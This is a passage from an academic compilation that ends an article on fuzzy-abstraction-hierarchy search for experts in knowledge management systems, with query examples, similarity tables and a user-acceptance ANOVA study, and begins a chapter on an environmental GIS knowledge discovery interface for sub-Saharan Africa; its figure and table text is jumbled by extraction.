a specialized field and an abstract field. In the generalized query, Generalize(‘Mathematics’, 1) returns the 1-level abstract field, “Natural Science,” and thus the query condition is relaxed as “WHERE FIELD is-a ‘Natural Science’”. Since the search condition is relaxed to have “Natural Science” as the subject field, all the experts classified in “Physics” and “Physical Chemistry,” which are 1-level sibling fields of “Mathematics,” will be included in the search result. Also, similarity measures between “Mathematics” and other fields can be either retrieved for 1-level sibling fields or calculated using the max-min operator if the specified level for generalization is 2 or above (Moon & Huh, 2003). Query tightening, on the contrary, is performed through specialize operation. It returns the list of specialized fields in the specified level below. For example, in a query “SELECT NAME, FIELD FROM EXPERT WHERE FIELD in Specialize(‘Natural Science’, 1),” the 1-level specialization of the abstract field, “Natural Science,” returns a set of specialized fields (“Mathematics,” “Physics,” “Physical Chemistry”) as the result. Thus, the query condition of specialized query is finally written as “FIELD in (‘Mathematics’, ‘Physics’, and ‘Physical Chemistry’)” and the user can choose a certain field out of the retrieved ones to reduce the search results. In addition, we can get all the n-level sibling fields with a certain level of similarity or above using query approximation. If a search query is given as “SELECT NAME, FIELD FROM EXPERT WHERE FIELD is-a Approximate(‘ Mathematics’, 2, 0.5),” 2-level sibling fields of “Mathematics” with a similarity measure of 0.5 or above are to be retrieved. In this case, they are “Computer Science” and “Mechanical Engineering” since they have the derived similarity of 0.6 with “Mathematics.” To simplify the illustration, we assume that there are only eight experts and their expertise details are summarized in Table 3. The subject field hierarchy defined in Figure 1 is used and
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
Figure 6. Example process of FAH-based search for experts Research Field 0.6
Original Query select name, level from expert where field =? ‘Math’
search Natural Science
0.5
Engineering
result
1
1 Mathematics
Physical Chemistry
Physics
0.6
Computer Science
0.8
Mechanical Engineering
1 SEARCH_THESAURUS
0.8
John: 23.5
Peter: 11.3
Brown: 22.1
Sally: 12.6
Smith: 4.1
Lucy: 9.8
Input
2
Kevin: 1.6
Sam: 7.8
select from where
Query Relaxation
name, level expert field =? ‘Mathematics’ 5
3 Query Generalization select name, level from expert where field is-a Generalize(‘Mathematics’, 1)
Expert John
23.5
Sally
12.6
Peter
select from where
7.8
Smith
3.3
EC
Electronic Commerce
···
···
Query Approximation select name, level from expert where field is-a Approximate(‘Mathematics’, 2, 0.5)
Expert
Expertise Level
Expert
Query Approximation
Brown
13.3
Lucy
5.9
Kevin
1.0
4
Query Specialization select name, level from expert where field is-a Specialize(‘Natural Science’, 1)
name, level expert field is-a Generalize(‘Mathematics’, 2)
9.0
Sam
Mathematics
Query Correction
Further Relaxation
Expertise Level
Correction
Math
Expertise Level
‘Mathematics’
‘Physical Chemistry’
‘Physics’
John
23.5
Sally
12.6
Peter
9.0
Sam
7.8
John
13.3
Peter
13.3
Brown
6.6
Sally
5.9
Smith
5.9
Smith
3.3
Sam
1.0
Lucy
2.9
Kevin
0.5
Expert
Expertise Level
Expert
Expertise Level
Expert
···
Expertise Level
···
Table 3. Similarity calculation for intelligent search for experts
Subject Field
Expertise Level
sim/ (Derived) sim with ‘Mathematics’
John
Mathematics
23.5
1
(2 − 1) + 1 2 = =1 2 2
23.5 × 1 = 23.5
Sally
Mathematics
12.6
1
(2 − 1) + 1 2 = =1 2 2
12.6 × 1 = 12.6
1
(2 − 1) + 1 2 = =1 2 2
7.8 × 1 = 7.8
0.6
(2 − 1) + 0.6 1.6 = = 0.8 2 2
11.3 × 0.8 ≈ 9.0 4.1 × 0.8 ≈ 3.3
Sam Peter Smith Brown Lucy Kevin
Mathematics Physics
7.8 11.3
(Extended) sim with ‘Mathematics’
Expertise Level × (Extended) sim
Expert
Physics
4.1
0.6
(2 − 1) + 0.6 1.6 = = 0.8 2 2
Mechanical Engineering
22.1
0.6
(2 − 2) + 0.6 0.6 = = 0.3 2 2
22.1 × 0.3 ≈ 6.6
9.8
0.6
(2 − 2) + 0.6 0.6 = = 0.3 2 2
9.8 × 0.3 ≈ 2.9
1.6
0.6
(2 − 2) + 0.6 0.6 = = 0.3 2 2
1.6 × 0.3 ≈ 0.5
Mechanical Engineering Mechanical Engineering
771
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
the similarity calculations for a search on field “Mathematics” are also shown in Table 3.
Application of Expert Management in Knowledge Portal The intelligent search concept for experts proposed in this article has been applied to “Knowledge Portal for Researchers in Science and Technology” sponsored by the Ministry of Science and Technology (MOST) of Korea and it is under public service at this time. The automatic expert classifier was developed using JAVA and RAINBOW (McCallum, 1996) developed by Carnegie Mellon University was chosen for the text categorization engine in Knowledge Portal. Figure 7 is a sample screen shot of Knowledge Portal providing the results of the search functionality for experts explained in this section. To build the subject field hierarchy for FAH in Knowledge Portal, we use the classification system in scientific and technological fields,
which was established by the Korea Science Foundation (KSF). KSF classifies all the scientific and technological research fields, which are very huge and complex, using three different levels of classes: upper, middle, and lower. The KSF classification system has four upper classes such as “Natural Science,” “Life Science,” “Engineering,” and “Multi-disciplinary,” and these upper classes include a total of 69 different middle class level subject fields. Each middle class field has seven to eight lower classes on the average, making the total number of lower classes in the hierarchy at 523. In Knowledge Portal, this subject field hierarchy is used for registering interested subject fields by users, classifying the registered knowledge artifacts, assigning the subject fields for each expert through the automatic profiling process, and applying FAH operations in the intelligent search process while interacting with system users who perform the searches for experts. For the initial training of the automatic expert classifier, we used 1,400 research project proposal
Figure 7. Sample screenshot of search for experts in knowledge portal
772
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
documents, which were also provided by KSF. Since each of these documents had a predefined subject field, which was the field the research proposal dealt with and one of the subject field defined in KSF field hierarchy at the same time, we decided that those proposal documents were great sources for training and testing the performance of the automatic expert classifier we implemented. We used about 60% of the documents for training and the remaining 580 documents for validating the classification correctness of the classifier. Due to the limited number of documents, we just measured the classification correctness up to the middle class level. When we considered ten subject fields, which were sorted decreasingly based on the number of documents belonging to each field, 73.25% of the documents were classified correctly and the average classification correctness rate is about the same among the subject fields. We expect to incorporate the lower level classes of subject fields in the training process while maintaining the satisfaction level of classification correctness if it is possible to collect enough training documents for each field.
To test the potential user acceptance of the proposed framework in their work, we conducted an empirical experiment. The participants consisted of 75 undergraduate students in IT-related majors. They were randomly divided into two groups, one with 37 students for a traditional system and the other with 38 students for FAH-based system. The first group was educated on the legacy system and experienced it, which was a KMS with manual expert profiling and conventional expert search functions. On the other hand, the second group was introduced to the new system equipped with automatic expert profiling and FAH-based search features. Their perceived usefulness and perceived ease of use about each system were measured using the well-known 12 items from the study of Davis (1989). They were asked to rate the extent to which they agree with each statement about the system they experienced by selecting one of the seven points labeling from “Strongly Agree” to “Strongly Disagree.” From the responses, we ruled out three outlier cases, and finally 35 cases for the legacy system and 37 for FAH-based system were used for the statistical analysis. To see the differences among
Table 4. Results of ANOVA
Between Perceived Groups UsefulWithin ness Groups Total Between Perceived Groups Ease of Within Use Groups Total
Sum of Squares
df
Mean Square
F
Sig.
13.784
1
13.784
41.463
.000
23.270
70
.332
37.054
71
.994
1
.994
2.685
.106
25.911
70
.370
26.904
71
773
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
the two user groups in terms of perceived usefulness and perceived ease of use, we conducted one way ANOVA tests, which can show any statistically meaningful differences in their perceptions of each system by comparing the variances of their answers. The results of the experiment are summarized in Table 4. From the table, we can conclude that there is a statistically meaningful difference (p-value = .000) in perceived usefulness among the groups and there are not any differences in perceived ease of use (p-value = .106) under 95% significant level. Since the mean value of FAHbased system group is less than the other group in perceived usefulness factor, it means that the participants view FAH-based system is more useful than the legacy system. In summary, a FAH-based system using the proposed framework in this article is better in terms of perceived usefulness and there are not any statistically meaningful differences among the two groups in terms of perceived ease of use. Therefore, we can conclude that users are willing to accept the intelligent expert management features in their work because they think that they are useful. At the same time, it would be as easy as the traditional systems to learn the new system features.
SUMMARY AND CONCLUSION Managing tacit knowledge is considered critical to stay competitive in the recent business world. Although many approaches have been developed and proposed for this challenging task, not many successful results can be found. One of many research directions in the knowledge management field has proposed that providing an effective and efficient search functionality for experts is a feasible solution in managing tacit knowledge since it is not always possible or reasonable to separate intangible knowledge from its holders or codify it, which is usually embedded as in-
774
trinsic skills or know-how of the experts within the organization. In this article, we propose an intelligent search framework for experts, which is applicable to knowledge management systems. The following advantages are manifest in adopting the proposed framework. First, KMS can be equipped with intelligent search capabilities for experts, which include finding experts in similar or related fields and providing the comparative expertise level of each expert. Knowing the best candidates available for solving the problems on hand can increase the satisfaction level of users on the search results especially when there are no experts matching the search condition exactly. Second, the expert profiling process can be automated using the proposed expertise structure. Maintaining up-to-date expert profiles is a necessary requirement for providing accurate information to users. Although the importance of the task is well known, it is not a trivial thing to do since it requires constant maintenance costs and time. Automating the expert profiling process can reduce the maintenance costs involved as well as increase the objectivity of the process which might be somewhat subjective otherwise. The expertise profile is defined and used to calculate the expertise level of experts and the calculated expertise measures are also provided as additional information for users to determine the experts that they might contact for help. Third, the knowledge representation framework called FAH has been improved through adopting a text categorization technique to calculate initial similarity measures among sibling fields in the hierarchy, which needed to be assigned by a domain expert before. This improvement also reduces the maintenance costs of the system adopting the intelligent search framework for experts by automating the update process of the subject field hierarchy which provides the basis for expert profiling and search functionality for similar experts.
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
For the further research, we are trying to expand the intelligent search framework for experts to incorporate multidisciplinary knowledge artifacts. While trying to devise ways to adopt differentiated similarity measures for level differences, which are assumed to be 1 in this article, we are focusing on algorithmic research to improve the efficiency of the automatic expert classifier.
ACKNOWLEDGMENT This research was supported by the Ministry of Information and Communication, Korea, under the College Information Technology Research Center Support Program, grant number IITA2005-C1090-0502-0016.
REFERENCES Alavi, M., & Leidner, D.E. (2001). Review. Knowledge management and knowledge management systems: Conceptual foundations and research issues. MIS Quarterly, 25(1), 107-136. Augier, M., & Vendelo, M.T. (1999). Networks, cognition and management of tacit knowledge. Journal of Knowledge Management, 3(4), 252261.
tive relational database querying. International Journal of Pattern Recognition and Artificial Intelligence, 14(1), 73-90. Buckingham-Shum, S.J., & Hammond, N. (1994). Argumentation-based design rationale: What use at what cost? Human-Computer Studies, 40(4), 603-652. Cai, Y., Cercone, N., & Han, J. (1993). Attribute-oriented induction in relational databases. Knowledge discovery in databases. Maryland: AAAI/MIT Press. Chan, T.M. (1998). Approximate nearest neighbor queries revisited. Discrete & Computational Geometry, 20(3), 359-374. Chomicki, J. (2004). Semantic optimization of preference queries. In Proceedings of the 1st International Symposium on Constraint Databases (pp. 128-142). Conklin, J.E., & Yakemovic, K.B. (1991). A process-oriented approach to design rationale. Human-Computer Interaction, 6(3-4), 357–391. Corcho, O., Fernandez-Lopez, M., & Gomez-Perez, A. (2003). Methodolgies, tools, and languages for building ontologies. Where is their meeting point? Data & Knowledge Engineering, 46(1), 41-64.
Baeza-Yates, R., & Riberio-Neto, B. (1999). Modern information retrieval. New York: ACM Press.
Dang, T.K., Kung, J., & Wagner, R. (2002). A general and efficient approach for solving nearest neighbor problem in the vague query system. (LNCS, 2419) (pp. 367-378)
Belkin, N.J., & Croft, W.B. (1992). Information filtering and information retrieval: Two sides of the same coin? Communications of the ACM, 35(12), 29-38.
Davis, F.D. (1989). Perceived usefulness, perceived ease of use, and user acceptance of information technology. MIS Quarterly, 13(3), 319–340.
Booch, G., Rumbaugh, J., & Jacobson, I. (1999). The unified modeling language user guide. Boston: Addison Wesley.
Desouza, K.C. (2003). Barriers to effective use of knowledge management systems in software engineering. Communications of the ACM, 46(1), 99-101.
Braga, J.L., Laender, A.H.F., & Ramos, C.V. (2000). A knowledge-based approach to coopera-
775
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
Dubois, D., & Prade, H. (1980). Fuzzy sets and systems: Theory and applications. London: Academic Press. Furnas, G.W., Deerwester, S., Dumais, S.T., Landauer, T.K., Harshman, R.A., & Streeter, L.A. (1988). Information retrieval using a singular value decomposition model of latent semantic structure. In Proceedings of the 11th Annual International ACM SIGIR Conference on Research and Development in Information Retrieval (pp. 465-480). Gentili, G.L. Marinilli, M., Micarelli, A., & Sciarrone, F. (2001). Text categorization in an intelligent agent for filtering information on the Web. International Journal of Pattern Recognition and Artificial Intelligence, 15(3), 527-549. Handysoft (2003). BizFlow KMS. Retrieved March 2, 2007, from http://corona.handysoft. co.kr/eng/ Hansen, M.T., Nohria, N., & Tierney, T. (1999). What’s your strategy for managing knowledge? Harvard Business Review, 77(2), 106-116. Hu, X. Pang, J., Pang, Y., Atwood, M., Sun, W., & Regli, W.C. (2000). A survey on design rationale: Representation, capture and retrieval. In Proceedings of 2000 ASME Design Engineering Technical Conferences (pp. 10-13). Baltimore, MD. Huh, S.Y., & Lee, J.W. (2001). Providing approximate answers using a knowledge abstraction database. Journal of Database Management, 12(2), 14-24. Huh, S.Y., Moon, K.H., & Lee, H. (2000). A data abstraction approach for query relaxation. Information and Software Technology, 42(6), 407-418. Jurisica, I., Mylopoulos, J., & Yu, E. (2004). Ontologies for knowledge management: An information systems perspective. Knowledge and Information Systems, 6(4), 380-401.
776
Kakabadse, N.K., Kouzmin, A., & Kakabadse, A. (2001). From tacit knowledge to knowledge management: Leveraging invisible assets. Knowledge and Process Management, 8(3), 137-154. King, W.R. (2006). The critical role of information processing in creating an effective knowledge organization. Journal of Database Management, 17(1), 1-15. Klein, M., & Konig-Ries, B. (2004). Combining query and preference: An approach to fully automatize dynamic service binding. In Proceedings of IEEE International Conference on Web Services (pp. 788-791). Ko, Y., Park, J., & Seo, J. (2004). Improving text categorization using the importance of sentences. Information Processing and Management, 40(1), 65-79. Kreiner, K. (2002). Tacit knowledge management: The role of artifacts. Journal of Knowledge Management, 6(2), 112-123. Kwan, M.M., & Cheung, P.K. (2006). The knowledge transfer process: From field studies to technology development. Journal of Database Management, 17(1), 16-32. Kwon, O.W., & Lee, J.H. (2003). Text categorization based on k-nearest neighbor approach for Web site classification. Information Processing and Management, 39(1), 25-44. Lam, W., Ruiz, M., & Srinivasan, P. (1999). Automatic text categorization and its application to text retrieval. IEEE Transactions on Knowledge and Data Engineering, 11(6), 865-879. Lee, D.L., Chuang, H., & Seamons, K. (1997). Document ranking and the vector-space model. IEEE Software, 14(2), 67-75. Lertnattee, V., & Theeramunkong, T. (2004). Effect of term distributions on centroid-based text categorization. Information Sciences, 158, 89-115.
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
Liebowitz, J. (2001). Knowledge management and its link to artificial intelligence. Expert Systems with Applications, 20(1), 1-6.
Salton, G., & Yang, C.S. (1973). On the specification of term values in automatic indexing. Journal of Documentation, 29, 351-372.
McCallum, A.K. (1996). Bow: A toolkit for statistical language modeling, text retrieval, classification and clustering. Retrieved March 2, 2007, from http://www.cs.cmu.edu/~mccallum/bow/.
Siau, K. (2000). Knowledge discovery as an aid to organizational creativity. Journal of Creative Behavior, 34(4), 248-258.
Microsoft (2004). Microsoft SharePoint products and technologies. Retrieved March 2, 2007, from http://www.microsoft.com/sharepoint/. Moon, K.H., & Huh, S.Y. (in press). An integrated query relaxation approach adopting data abstraction and fuzzy relation. Information Systems Research. Nah, F., Siau, K., & Tian, Y. (2005). Knowledge management mechanisms of financial service sites. Communications of the ACM, 48(6), 117123.
Sorensen, C., & Snis, U. (2001). Innovation through knowledge codification. Journal of Information Technology, 16(2), 83-97. Sugumaran, V., & Storey, V.C. (2002). Ontologies for conceptual modeling: Their creation, use, and management. Data & Knowledge Engineering, 42(3), 251-271. Tokunaga, T., & Iwayama, M. (1994). Text categorization based on weighted inverse document frequency (Technical Report). Advanced Research Laboratory, Hitachi Ltd.
Nonaka, I., & Takeuchi, H. (1995). Knowledge creating company. New York: Oxford University Press.
Turtle, H., & Croft, W.B. (1991). Evaluation of an inference network-based retrieval model. ACM Transactions on Information Systems, 9(3), 187-222.
O’Dell, C., & Grayson, C.J. (1998). If only we knew what we know: Identification and transfer of internal best practices. California Management Review, 40(3), 154-174.
Verity (2004). Verity K2 architecture: Unprecedented performance, scalability and fault tolerance. Retrieved March 2, 2007, from http://www. verity.com/products/k2_enterprise/.
Ruiz, M.E., & Srinivasan, P. (2002). Hierarchical text categorization using neural networks. Information Retrieval, 5(1), 87-118.
Rus, I., & Lindvall, M. (2002). Knowledge management in software engineering. IEEE Software, 19(3), 26-38.
Zadeh, L. (1973). Outline of a new approach to the analysis of complex systems and decision processes. IEEE Transactions on Systems Management and Cybernetics, SMC, 3(1), 28-44.
Salton, G., & Lesk, M.E. (1968). Computer evaluation of indexing and text processing. Journal of the ACM, 15(1), 8-36.
This work was previously published in Journal of Database Management, edited by K. Siau, Volume 18, Issue 3, pp. 48-68, copyright 2007 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
777
778
Chapter 2.19
Building an Environmental GIS Knowledge Infrastructure Inya Nlenanya Iowa State University, USA
ABSTRACT Technologies such as geographic information systems (GIS) enable geospatial information to be captured, updated, integrated, and mapped easily and economically. These technologies create both opportunities and challenges for achieving wider and more effective use of geospatial information in stimulating and sustaining sustainable development through smart policy making. This chapter proposes a simple and accessible conceptual knowledge discovery interface that can be used as a tool to accomplish that. In addition, it addresses some issues that might make this knowledge infrastructure stimulate sustainable development with emphasis on sub-Saharan Africa.
INTRODUCTION Technologies such as geographic information systems (GIS) enable geographic information to be captured, updated, integrated, and mapped easily
and economically. These technologies create both opportunities and challenges for achieving wider and more effective use of geoinformation in stimulating and sustaining sustainable development through smart policy making. With the start of a new millennium humankind faces environmental changes greater in magnitude than ever before as the scale of the problem shifts from local to regional and to global. Environmental problems such as global climate change and unsustainable developments in many parts of the world are evolving as major issues for the future of the planet and of mankind. Acidification of lakes and rivers, destruction of vital natural wetlands, loss of biotic integrity and habitat fragmentation, eutrophication of surface waters, bioaccumulation of toxic pollutants in the food web, and degradation of air quality contribute some of the many examples of how human-induced changes have impacted the Earth system. These human induced changes are stressing natural systems and reducing biological diversity at a rate and magnitude not experienced for millions of years (Speth,
Building an Environmental GIS Knowledge Infrastructure
2004). Also, anthropogenic stresses such as those associated with population growth, dwindling resources, chemical and biological pollution of water resources are expected to become more acute and costly. The approach in dealing with these environmental issues requires a balanced response in the form of an environmental management strategy. Such a response must utilize the best available scientific understanding and data in addition to an infrastructure that combines both in order to deliver sound science-based solutions to the myriad of environmental problems. In the Fall 2003 edition of the Battelle Environmental Updates, it was argued that such a response would result in a complex decision network. This argument must have inspired the National Science Foundation (NSF) in 2004 to propose a network of infrastructure called National Ecological Observatory Network (NEON). NEON supports continental-scale research targeted to address the environmental challenges by facilitating the study of common themes and the transfer of data and information across research sites (NAS, 2004). This creates a platform that enables easy and quick access to the environmental data needed to tackle the environmental challenges. NEON is based on the same concept as grid computing. Grid computing eliminates the need to have all data in one place through on-demand aggregation of resources at multiple sites (Chetty & Buyya, 2002). This creates an enabling platform for the collection of more specialized data with the hope of integrating them with data from other related areas. This has particular benefit in environmental data management and analysis since both data and specific processing methods are frequently exchanged and used within various organizations (Vckovski & Bucher, 1996). Together, NEON and grid computing form the enabler for the construction of an environmental cyberinfrastructure that will permit the transfer of data, the specific processing methods and the
interoperability of these methods so as to reduce the time wasted in duplication of resources. This infrastructure is necessary especially in the face of unprecedented data availability. During the last decade, the society has witnessed a tremendous development in the capabilities to generate and acquire environmental data to support policy and decision-making. Furthermore, the rapid and exploding growth of online environmental data due to the Internet and the widespread use of ecological and biological databases have created an immense need for intuitive knowledge discovery and data mining methodologies and tools. However, in Africa, where according to Song (2005) the bandwidth speed of an average university has the same aggregate bandwidth as a single home user in North America or Europe and costs more than 50 times for this bandwidth than its counterparts in Europe or North America deserves special attention while establishing such networks. This statistics is from a continent where the major issues include hunger, poverty, AIDS, and political instability and these summarizes why sub-Saharan Africa in this knowledge age is still undeveloped and unable to tackle her own environmental problems. Clearly, a survey of the wealthiest nations in the world would quickly reveal that GDP is directly proportional to the volume of digital information exchange. Technology transfer has not been able to make a mark in Africa simply because the proponents ignored the social and economic questions of access to markets, fair wages, water, land rights, and so forth, in favor of purely technical questions and rejecting the indigenous knowledge in the process. Hence with all the progress made in cutting edge technology for data acquisition, there is still a dearth of geographic information exchange in sub-Saharan Africa. Sobeih (2005) argues that, “GIS is considered to be one of the most important tools for increased public participation and development that offers
779
Building an Environmental GIS Knowledge Infrastructure
new socio-economic development opportunities. It can encourage human resource development within the country, facilitate the participation of youth in public life, help provide an analytic and scientific understanding of development issues, and much more” (p. 190). Evidently, in a region of the world marked with political instability, the role of the private sector and the ordinary citizen has become elevated. Hence, the need to increase capacity for handling GIS tools in environmental policy making. All the more important is this environmental GIS knowledge interface as the wealth of the continent lies in the environment. The participants at the AFRICAGIS 2005 Conference which held at South Africa concluded deliberations by recognizing the opportunity provided by geospatial information for use in the development in Africa. Consequently, the specific objectives of this chapter are: 1.
2.
3.
To develop a simple and accessible conceptual knowledge infrastructure that can be used as a tool to introduce GIS into the education curriculum in sub-Saharan Africa To adapt (1) to the current context of sub-Saharan Africa taking into effect the prevailing social and economic questions To proffer policies for development in subSaharan Africa
BACKGROUND From the history of GIS, it is without doubt that environmental application has been one of the motivating factors that led to the development of GIS in the mid-1960’s (Longley, Goodchild, Maguire & Rhind, 2001). This is due to the fact that environmental issues arise as a result of human activities and almost all human activities involve a geographic component (Blaschke, 2001; Longley et al., 2001; Rautenstrauch & Page, 2001). From
780
infancy in land use applications in Canada, GIS has evolved to an all enveloping technology that has found useful applications in every facet of human enterprise. Technologies such as global positioning systems (GPSs) and remote sensing satellites have been largely responsible for the GIS evolution complemented with reductions in the cost of computer hardware, electronic storage media, etc (Chainey & Ratcliffe, 2005; Longley et al., 2001). Ratcliffe (2004) believes that in addition to the technology aspect of GIS evolution, the discipline has also benefited immensely from what he refers to as the scientific development of the discipline, an angle developed by Goodchild (1991) and Longley et al. (2001). As a result, GIS has seen the adaptation of analytical methods, techniques and processes to problems with a spatial component—and every human activity has a spatial axis, thereby making GIS omnipresent in modern life (Chainey & Ratcliffe, 2005) and a partner in development. As a partner in development, there is need to leverage all the utility of GIS to increase the environmental knowledge base in sub-Saharan Africa. In the global economy, knowledge is everything, which is one thing that industrialized countries have in common (Mokyr, 2002). But before one gets to knowledge, data is needed. There is a dearth of environmental data in developing countries (Kufoniyi, Huurneman & Horn, 2005; Rüther, 2001). And where they are available, they are not in digital format (Dunn, Atkins & Townsend, 1997). Organizations such as Environmental Information Systems-Africa (EIS-Africa), USAID and other notable international organizations have been in the forefront of the campaign to bridge the environmental knowledge gap by concentrating on human and institutional capacity building in the GIS sector and in encouraging the integration of GIS into policy making. As a way of strengthening these efforts, this chapter proposes a knowledge discovery interface.
Building an Environmental GIS Knowledge Infrastructure
KNOWLEDGE DISCOVERY INTERFACE A knowledge discovery interface (KDI) is a type of interface that provides the means by which users can connect the suite of data mining tools to communicate with each other irrespective of their implementation and at the same time communicate with the data. KDI defines the range of permissible inputs, outputs and controls between the elements that make up the knowledge discovery process in order to encourage more participation from various fields of study which may not be part of the traditional data mining research catchment’s area. The knowledge discovery process is a computationally-intensive task consisting of complex interactions between a human and a large database, supported by heterogeneous suite of tools (Brachman & Anand, 1996). Consequently a knowledge discovery interface defines the rules for the complex interactions between not just the user and a large database but most importantly between the heterogeneous suite of tools and a large assortment of databases. It is very important that this suite of data mining tools sees the assortment of databases as a whole and not just as a sum of the parts since the best picture is being looked for. In this case, the best picture is one that takes from all sources and presents an output that is unique to all its sources. This is very significant because in knowledge discovery the object is not to look for the obvious but for some interesting pattern (Fayyad, Piatetsky-Shapiro & Smyth, 1996) that can be used for decision making. To further understand the concept of the KDI, the author is going to look at some of the definitions of knowledge discovery in database in order to get a better understanding of the knowledge discovery process. Koua and Kraak (2004) defines knowledge discovery as a higher level process using information from the data mining process to turn it into knowledge or integrate it with prior
knowledge. They went on to present a more general definition borrowing from Miller and Han (2001) and Fayyad et al. (1996), as “discovering and visualizing the regularities, structures and rules from data, discovering useful knowledge from data and for finding new knowledge.” This definition takes into account the research area of data visualization, which hitherto has been largely ignored in knowledge discovery research (Lee, Ong & Quek, 1995). From this definition, a KDI provides the means of integrating the discovering of information from a database via statistical techniques and machine learning with visualization techniques so that the two work seamlessly to extract new knowledge or add to existing. A KDI provides the means for controlling the complex processes of extraction, organization and presentation of discovered information (Brachman & Anand, 1996) from a database. This definition encompasses the various steps in the knowledge discovery process. In Miller (in press) the knowledge discovery process is grouped into the following steps as shown in Figure 1: • •
•
Data preprocessing (data selection, data cleaning and data reduction) Data mining (choosing the data mining task, choosing the data mining technique and data mining) Knowledge construction (interpreting the mined patterns and consolidating the discovered knowledge)
The steps are independent and, therefore, a KDI provides the protocol that connects the steps. Mitra and Acharya (2003) add a new dimension in their assessment of the knowledge discovery process as involving all that have been mentioned above plus the modeling and the support of the overall human machine interaction. A KDI, in short, is the connection between the user, the knowledge discovery tools and the data.
781
Building an Environmental GIS Knowledge Infrastructure
Figure 1. Overview of the knowledge discovery process
Why a Knowledge Discovery Interface is Needed A KDI simplifies the process of knowledge discovery by making it easy for the user to interact with the wealth of environmental data and the suite of data mining tools available. This has the potential to encourage more participants and to expand the knowledge input into the research field. It provides the key to a human-centered knowledge discovery process that Brachman and Anand (1996) emphasize since it gives the user control over the tools. This control is very important as advances in knowledge discovery technologies are yielding more tools than the user can grasp without the help of a KDI. As a result of the breakthroughs in data storage and data collection technologies, datasets for environmental studies now come in tera- or gigabytes of memory space. This factor is responsible for influencing the advances in artificial neural
782
networks that have enhanced the analysis and visual mining of large volumes of data. Keim (2002), in his assessment of visual data mining, argued that it gives an overview of the data and it is particularly good for noisy, inhomogeneous and large datasets which are a few of the characteristics of the data available for environmental modeling. He continued to present that visual data mining can be seen as a hypotheses generation process. It can also be used for hypotheses verification, but in union with automatic techniques from statistics or machine learning (Lee, Ong, Toh & Chan, 1996). Additionally, visual data mining can help the user to determine whether a certain data is the best choice for the targeted learning process. This makes visual data mining an important member of the suite of knowledge discovery tools. Hence, the need for KDI to integrate the visual data mining tools with nonvisual data mining tools. With a repertoire of already existing tools for handling spatial data, spatiotemporal data, and
Building an Environmental GIS Knowledge Infrastructure
nonspatial data, a knowledge discovery interface will eliminate the need to create a holistic system that handles all the forms of data from scratch. Instead, through a well-developed interface, these existing tools can be integrated for the benefit of knowledge extraction from all kinds of data models available for environmental applications. Examples of these existing tools include ArcGIS and spatial OLAP or SOLAP (which is an integration of geographic information system (GIS) and OLAP (Bedard, Gosselin, Rivest, Proulx, Nadeau & Lebel, 2003). Accordingly, the KDI reduces the time required for the deployment of a state-of-art knowledge discovery infrastructure. The iterative nature of the knowledge discovery process which is highlighted in Fayyad et al. (1996), Han (1999), NAS (2003), and Mitra et al. (2003) suggests that the process of applying tools and transformations in the task of knowledge discovery is repeated until the analyst discovers some striking regularities that were not known. This iterative character has the advantage of allowing the entire process to be broken into modules. KDI is very useful where modules exist because it defines the rules for inter-modular interaction. As a result, KDI enables a platform that leads to specialized stand-alone applications such that modifications can be made to one part without affecting the entire system. This is a view that Thuraisingham (1999) shares by recommending the development of data mining modules as a collection of generic reusable tools. The contribution of grid computing to the knowledge discovery process comes with its own attendant problem. With the availability of data in intranet repository and geodata on the Internet, the problem arises of what kind of data would be best for a particular learning process. Albertoni, Bertone, and De Martino (2003) captures this by acknowledging the urgent need for methods and tools to support the user in data exploration. He proposed a solution based on the integration of different techniques including data mining, visualization and graphical interaction techniques.
His approach aims to aid the user in making the right choice of data by offering both an automated presentation of data to dynamically visualize the metadata and interactive functionalities to discover the relationship among the different metadata attributes. This approach is hinting at creating a common control platform for these interactive functionalities to be integrated so that the user can manage them. KDI provides that common control. Metadata is mentioned here to underscore its prime place in data mining (Thuraisingham, 1999). The bulk of the knowledge discovery process is in the data preprocessing stage. Miller and Han (2001) describes the pre-processing of data which is partly accomplished in data warehouses as fundamental to the knowledge discovery process because it integrates and represents data in a manner that supports very efficient querying and processing. Zaiane, Han, Li, and Hou (1998) highlights its importance by observing that most of the studies done in knowledge discovery are confined to the data filtering step which is part of the data preprocessing stage. This presumes that the success of the overall process centers on how well the data is prepared before mining since the data preparation process has the power to bias the knowledge that can be extracted. Thuraisingham (1999) makes his own case for the importance of data warehousing in these words, “good data is the key to good mining.” As a result, advances in data warehousing and database integration would play a very important role in enhancing the knowledge discovery process. Database integration plays a role here because it provides the input to the data warehousing stage. For environmental applications, the data of choice is geo-spatial. Currently, conventional conceptual database models do not provide a straightforward mechanism to explicitly capture the semantics related to space (Khatri, Ram & Snodgrass, 2004). However, research is underway to develop tools for automatic integration of geo-spatial data (from well-structured vector and raster models to unstructured models
783
Building an Environmental GIS Knowledge Infrastructure
such as georeferenced multimedia data) from heterogeneous sources into one coherent source (NAS, 2003). This will enable applications to be designed that integrate geospatial data from different sources. The next logical step would be to provide a KDI that will integrate these applications into the overall knowledge discovery process. Another argument for the need for a KDI is the fact that data mining, and consequently the overall process of knowledge discovery, is a relatively young and interdisciplinary field, drawing from such areas as database management systems, data warehousing, data visualization, information retrieval, performance computing, and so forth. It needs the integration of approaches from multiple disciplines (Han, 1999). These fields that support knowledge discovery all have their own
Figure 2. KDI architecture
784
standards which creates the need for integration. In addition, research is currently underway to address the development of formalized platforms to enhance multidisciplinary research investments (NAS, 2003). A KDI would be advantageous to fully utilize the results of this research.
KDI System Conceptualization The KDI system consists of GIS components, data mining components and the interactions between the two. The degree of integration which is a measure of the interaction between the components would be loose coupling as opposed to tight coupling. In loose coupling, the interaction is limited in time and space, that is, control and data can be transferred directly between the com-
Building an Environmental GIS Knowledge Infrastructure
